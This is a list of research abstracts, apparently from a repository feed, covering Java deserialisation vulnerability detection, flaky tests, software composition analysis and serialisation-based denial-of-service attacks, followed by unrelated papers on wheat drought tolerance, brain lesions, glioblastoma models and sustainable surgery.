Security analyses for detecting deserialisation vulnerabilities : a thesis presented in partial fulfilment of the requirements for the degree of Doctor of Philosophy in Computer Science at Massey University, Palmerston North, New Zealand

An important task in software security is to identify potential vulnerabilities. Attackers exploit security vulnerabilities in systems to obtain confidential information, to breach system integrity, and to make systems unavailable to legitimate users. In recent years, particularly 2012, there has been a rise in reported Java vulnerabilities. One type of vulnerability involves (de)serialisation, a commonly used feature to store objects or data structures to an external format and restore them. In 2015, a deserialisation vulnerability was reported involving Apache Commons Collections, a popular Java library, which affected numerous Java applications. Another major deserialisation-related vulnerability that affected 55\% of Android devices was reported in 2015. Both of these vulnerabilities allowed arbitrary code execution on vulnerable systems by malicious users, a serious risk, and this came as a call for the Java community to issue patches to fix serialisation related vulnerabilities in both the Java Development Kit and libraries. Despite attention to coding guidelines and defensive strategies, deserialisation remains a risky feature and a potential weakness in object-oriented applications. In fact, deserialisation related vulnerabilities (both denial-of-service and remote code execution) continue to be reported for Java applications. Further, deserialisation is a case of parsing where external data is parsed from their external representation to a program's internal data structures and hence, potentially similar vulnerabilities can be present in parsers for file formats and serialisation languages. The problem is, given a software package, to detect either injection or denial-of-service vulnerabilities and propose strategies to prevent attacks that exploit them. The research reported in this thesis casts detecting deserialisation related vulnerabilities as a program analysis task. The goal is to automatically discover this class of vulnerabilities using program analysis techniques, and to experimentally evaluate the efficiency and effectiveness of the proposed methods on real-world software. We use multiple techniques to detect reachability to sensitive methods and taint analysis to detect if untrusted user-input can result in security violations. Challenges in using program analysis for detecting deserialisation vulnerabilities include addressing soundness issues in analysing dynamic features in Java (e.g., native code). Another hurdle is that available techniques mostly target the analysis of applications rather than library code. In this thesis, we develop techniques to address soundness issues related to analysing Java code that uses serialisation, and we adapt dynamic techniques such as fuzzing to address precision issues in the results of our analysis. We also use the results from our analysis to study libraries in other languages, and check if they are vulnerable to deserialisation-type attacks. We then provide a discussion on mitigation measures for engineers to protect their software against such vulnerabilities. In our experiments, we show that we can find unreported vulnerabilities in Java code; and how these vulnerabilities are also present in widely-used serialisers for popular languages such as JavaScript, PHP and Rust. In our study, we discovered previously unknown denial-of-service security bugs in applications/libraries that parse external data formats such as YAML, PDF and SVG

Flaky Test Sanitisation via On-the-Fly Assumption Inference for Tests with Network Dependencies

Flaky tests cause significant problems as they can interrupt automated build processes that rely on all tests succeeding and undermine the trustworthiness of tests. Numerous causes of test flakiness have been identified, and program analyses exist to detect such tests. Typically, these methods produce advice to developers on how to refactor tests in order to make test outcomes deterministic. We argue that one source of flakiness is the lack of assumptions that precisely describe under which circumstances a test is meaningful. We devise a sanitisation technique that can isolate f laky tests quickly by inferring such assumptions on-the-fly, allowing automated builds to proceed as flaky tests are ignored. We demonstrate this approach for Java and Groovy programs by implementing it as extensions for three popular testing frameworks (JUnit4, JUnit5 and Spock) that can transparently inject the inferred assumptions. If JUnit5 is used, those extensions can be deployed without refactoring project source code. We demonstrate and evaluate the utility of our approach using a set of six popular real-world programs, addressing known test flakiness issues in these programs caused by dependencies of tests on network availability. We find that our method effectively sanitises failures induced by network connectivity problems with high precision and recall.Comment: to appear at IEEE International Working Conference on Source Code Analysis and Manipulation (SCAM

On the Security Blind Spots of Software Composition Analysis

Modern software heavily relies on the use of components. Those components are usually published in central repositories, and managed by build systems via dependencies. Due to issues around vulnerabilities, licenses and the propagation of bugs, the study of those dependencies is of utmost importance, and numerous software composition analysis tools have emerged to address those issues. A particular challenge are hidden dependencies that are the result of cloning or shading where code from a component is "inlined", and, in the case of shading, moved to different namespaces. We present an approach to detect cloned and shaded artifacts in the Maven repository. Our approach is lightweight in that it does not require the creation and maintenance of an index, and uses a custom AST-based clone detection. Our analysis focuses on the detection of vulnerabilities in artifacts which use cloning or shading. Starting with eight vulnerabilities with assigned CVEs (four of those classified as critical) and proof-of-vulnerability projects demonstrating the presence of a vulnerability in an artifact, we query the Maven repository and retrieve over 16k potential clones of the vulnerable artifacts. After running our analysis on this set, we detect 554 artifacts with the respective vulnerabilities (49 if versions are ignored). We synthesize a testable proof-of-vulnerability project for each of those. We demonstrate that existing SCA tools often miss these exposures.Comment: 16 pages, 1 figur

Evil Pickles: DoS Attacks Based on Object-Graph Engineering (Artifact)

This artefact demonstrates the effects of the serialisation vulnerabilities described in the companion paper. It is composed of three components: scripts, including source code, for Java, Ruby and C# serialisation-vulnerabilities, two case studies that demonstrate attacks based on the vulnerabilities, and a contracts-based mitigation strategy for serialisation-based attacks on Java applications. The artefact allows users to witness how the serialisation-based vulnerabilities result in behavior that can be used in security attacks. It also supports the repeatability of the case study experiments and the benchmark for the mitigation measures proposed in the paper. Instructions for running the tasks are provided along with a description of the artefact setup

Evil Pickles: DoS Attacks Based on Object-Graph Engineering

In recent years, multiple vulnerabilities exploiting the serialisation APIs of various programming languages, including Java, have been discovered. These vulnerabilities can be used to devise in- jection attacks, exploiting the presence of dynamic programming language features like reflection or dynamic proxies. In this paper, we investigate a new type of serialisation-related vulnerabilit- ies for Java that exploit the topology of object graphs constructed from classes of the standard library in a way that deserialisation leads to resource exhaustion, facilitating denial of service attacks. We analyse three such vulnerabilities that can be exploited to exhaust stack memory, heap memory and CPU time. We discuss the language and library design features that enable these vulnerabilities, and investigate whether these vulnerabilities can be ported to C#, Java- Script and Ruby. We present two case studies that demonstrate how the vulnerabilities can be used in attacks on two widely used servers, Jenkins deployed on Tomcat and JBoss. Finally, we propose a mitigation strategy based on contract injection

Root and canopy traits and adaptability genes explain drought tolerance responses in winter wheat

Bread wheat (Triticum aestivum L) is one of the three main staple crops worldwide contributing 20% calories in the human diet. Drought stress is the main factor limiting yields and threatening food security, with climate change resulting in more frequent and intense drought. Developing drought-tolerant wheat cultivars is a promising way forward. The use of holistic approaches that include high-throughput phenotyping and genetic markers in selection could help in accelerating genetic gains. Fifty advanced breeding lines were selected from the CIMMYT Turkey winter wheat breeding program and studied under irrigated and semiarid conditions in two years. High-throughput phenotyping was done for wheat crown root traits and canopy senescence dynamics using vegetation indices (green area using RGB images and Normalized Difference Vegetation Index using spectral reflectance). In addition, genotyping by KASP markers for adaptability genes was done. Overall, under semiarid conditions yield reduced by 3.09 t ha-1 (-46.8%) compared to irrigated conditions. Genotypes responded differently under drought stress and genotypes 39 (VORONA/HD24- 12//GUN/7/VEE#8//. . ./8/ALTAY), 18 (BiII98) and 29 (NIKIFOR//KROSHKA) were the most drought tolerant. Root traits including shallow nodal root angle under irrigated conditions and root number per shoot under semiarid conditions were correlated with increased grain yield. RGB based vegetation index measuring canopy green area at anthesis was better correlated with GY than NDVI was with GY under drought. The markers for five established functional genes (PRR73.A1 -flowering time, TEF-7A -grain size and weight, TaCwi.4A - yield under drought, Dreb1- drought tolerance, and ISBW11.GY.QTL.CANDIDATE- grain yield) were associated with different drought-tolerance traits in this experiment. We conclude that-genotypes 39, 18 and 29 could be used for drought tolerance breeding. The trait combinations of canopy green area at anthesis, and root number per shoot along with key drought adaptability makers (TaCwi.4A and Dreb1) could be used in screening drought tolerance wheat breeding lines

Microvessel stenosis, enlarged perivascular spaces, and fibrinogen deposition are associated with ischemic periventricular white matter hyperintensities

Periventricular white matter hyperintensities (pvWMH) are neuroimaging abnormalities surrounding the lateral ventricles that are apparent on magnetic resonance imaging (MRI). They are associated with age, neurodegenerative disease, and cerebrovascular risk factors. While pvWMH ultimately represent a loss of white matter structural integrity, the pathological causes are heterogeneous in nature, and currently, cannot be distinguished using neuroimaging alone. pvWMH could occur because of a combination of small vessel disease (SVD), ependymal loss, blood–brain barrier dysfunction, and microgliosis. In this study we aimed to characterize microvascular stenosis, fibrinogen extravasation, and microgliosis within pvWMH with and without imaging evidence of periventricular infarction. Using postmortem neuroimaging of human brains (n = 20), we identified pvWMH with and without periventricular infarcts (PVI). We performed histological analysis of microvessel stenosis, perivascular spaces, microgliosis, and immunohistochemistry against fibrinogen as a measure of serum protein extravasation. Herein, we report distinctions between pvWMH with and without periventricular infarcts based on associations with microvessel stenosis, enlarged perivascular spaces, and fibrinogen IHC. Microvessel stenosis was significantly associated with PVI and with cellular deposition of fibrinogen in the white matter. The presence of fibrinogen was associated with PVI and increased number of microglia. These findings suggest that neuroimaging-based detection of infarction within pvWMH may help distinguish more severe lesions, associated with underlying microvascular disease and BBB dysfunction, from milder pvWMH that are a highly frequent finding on MRI

Proteomic profiling of patient-derived glioblastoma xenografts identifies a subset with activated EGFR: implications for drug development

The development of drugs to inhibit glioblastoma (GBM) growth requires reliable preclinical models. To date, proteomic level validation of widely used patient-derived glioblastoma xenografts (PDGX) has not been performed. In the present study, we characterized 20 PDGX models according to subtype classification based on The Cancer Genome Atlas (TCGA) criteria, TP53, PTEN, IDH 1/2 and TERT promoter genetic analysis, EGFR amplification status, and examined their proteomic profiles against those of their parent tumors. The 20 PDGXs belonged to three of four TCGA subtypes: 8 classical, 8 mesenchymal, and 4 proneural; none neural. Amplification of EGFR gene was observed in 9 out of 20 xenografts, and of these, 3 harbored the EGFRvIII mutation. We then performed proteomic profiling of PDGX, analyzing expression/activity of several proteins including EGFR. Levels of EGFR phosphorylated at Y1068 vary considerably between PDGX samples, and this pattern was also seen in primary GBM. Partitioning of 20 PDGX into high (n=5) and low (n=15) groups identified a panel of proteins associated with high EGFR activity. Thus, PDGX with high EGFR activity represent an excellent preclinical model to develop therapies for a subset of GBM patients whose tumors are characterized by high EGFR activity. Further, the proteins found to be associated with high EGFR activity can be monitored to assess the effectiveness of targeting EGFR

Reducing the environmental impact of surgery on a global scale: systematic review and co-prioritization with healthcare workers in 132 countries

Abstract Background Healthcare cannot achieve net-zero carbon without addressing operating theatres. The aim of this study was to prioritize feasible interventions to reduce the environmental impact of operating theatres. Methods This study adopted a four-phase Delphi consensus co-prioritization methodology. In phase 1, a systematic review of published interventions and global consultation of perioperative healthcare professionals were used to longlist interventions. In phase 2, iterative thematic analysis consolidated comparable interventions into a shortlist. In phase 3, the shortlist was co-prioritized based on patient and clinician views on acceptability, feasibility, and safety. In phase 4, ranked lists of interventions were presented by their relevance to high-income countries and low–middle-income countries. Results In phase 1, 43 interventions were identified, which had low uptake in practice according to 3042 professionals globally. In phase 2, a shortlist of 15 intervention domains was generated. In phase 3, interventions were deemed acceptable for more than 90 per cent of patients except for reducing general anaesthesia (84 per cent) and re-sterilization of ‘single-use’ consumables (86 per cent). In phase 4, the top three shortlisted interventions for high-income countries were: introducing recycling; reducing use of anaesthetic gases; and appropriate clinical waste processing. In phase 4, the top three shortlisted interventions for low–middle-income countries were: introducing reusable surgical devices; reducing use of consumables; and reducing the use of general anaesthesia. Conclusion This is a step toward environmentally sustainable operating environments with actionable interventions applicable to both high– and low–middle–income countries